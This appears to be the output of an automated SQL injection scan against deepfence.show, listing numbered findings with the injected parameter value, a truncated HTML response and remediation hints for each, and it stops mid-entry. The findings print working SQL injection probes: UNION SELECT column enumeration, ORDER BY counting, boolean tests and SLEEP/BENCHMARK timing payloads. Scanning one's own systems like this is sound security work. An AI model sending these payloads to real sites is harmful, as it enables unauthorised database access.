ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1483\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1484\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1485\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1486\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %' AND 8310=8311 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1487\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 12ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1488\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1489Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1490\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' AND id IS NULL; --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1491\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1492\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1493\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1494\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1495\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1496\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %' AND 8310=8310 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> 